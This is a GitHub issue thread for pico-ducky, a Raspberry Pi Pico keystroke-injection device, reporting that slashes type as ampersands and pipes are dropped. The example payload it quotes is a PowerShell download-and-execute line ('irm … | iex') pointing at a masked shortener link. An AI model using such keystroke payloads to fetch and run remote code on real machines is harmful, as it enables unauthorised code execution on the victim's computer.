dbisu / pico-ducky

Create a USB Rubber Ducky like device using a Raspberry PI Pico
GNU General Public License v2.0
2.41k stars 440 forks source link

Slashe (/) converted to &, and PIPE not typed (|) #280

Closed vexnity closed 2 months ago

vexnity commented 2 months ago

Describe the issue My ducky converts slashes to & when typing, and doesnt type Pipes (|)

To Reproduce Steps to reproduce the behavior: Download the attached zip, ( setp.zip ) connect pico in bootsel, flash nuke.uf2, flash circuitpython for pico w, copy all the other files, copy the following payload.dd:

DELAY 100
STRING powershell irm bit.ly/##### | iex

it will open RUN, wait, then type:

powershell irm bit.ly&####  iex

Expected behavior I expected it to type:

powershell irm bit.ly/##### | iex

setp.zip

vexnity commented 2 months ago

Let me know if you want any more details

vexnity commented 2 months ago

Solved by opening ducky.py and commenting out the lines that the script tells you to